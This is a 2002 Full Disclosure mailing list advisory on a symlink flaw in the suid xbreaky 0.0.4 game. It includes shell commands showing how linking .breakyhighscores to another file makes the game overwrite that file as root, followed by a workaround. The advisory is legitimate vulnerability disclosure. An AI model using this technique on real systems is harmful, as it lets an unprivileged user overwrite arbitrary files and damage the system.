Full Disclosure mailing list archives
xbreaky symlink vulnerability
From: m.v.berkum () obit nl (Marco van Berkum)
Date: Tue, 10 Sep 2002 20:24:36 +0200
----------------------------------------------------------------------- Title: xbreaky 0.0.4 symlink vulnerability Author: Marco van Berkum Classification: High risk Date: 10/09/2002 Email: m.v.berkum () obit nl Company: OBIT Company site: http://www.obit.nl Personal website: http://ws.obit.nl ----------------------------------------------------------------------- About xbreaky ------------- xbreaky is a breakout game for X written by Dave Brul which can be downloaded from http://xbreaky.sourceforge.net. xbreaky is added to the OpenBSD ports tree, NetBSD tree and possibly others. Problem ------- By default xbreaky is installed as suid and can be abused to overwrite any file on the filesystem, by any user. Exploit ------- xbreaky uses $HOME/.breakyhighscores to write the highscores to, when $HOME/.breakyhighscores is symlinked to another file (*any* file) it simply overwrites it as root user. Example ------- root@animal:/home/marco# echo "bla" >rootfile root@animal:/home/marco# chmod 600 rootfile root@animal:/home/marco# exit logout marco@animal:~$ ln -s rootfile .breakyhighscores marco@animal:~$ xbreaky Now I play a game and set highscore as user "lol", then I exit the game. Its a nice game btw :) marco@animal:~$ cat rootfile cat: rootfile: Permission denied marco@animal:~$ su - Password: root@animal:~# cat /home/marco/rootfile lol <- voila, our highscore user Workaround ---------- Remove suidbit. Author ------ The author has been notified. Credits ------- Thanks to Dennis Oelkers for testing. -- find / -user your -name base -exec chown us:us {}\; ---------------------------------------- | Marco van Berkum / MB17300-RIPE | | m.v.berkum () obit nl / http://ws.obit.nl | ----------------------------------------
Current thread:
- xbreaky symlink vulnerability Marco van Berkum (Sep 10)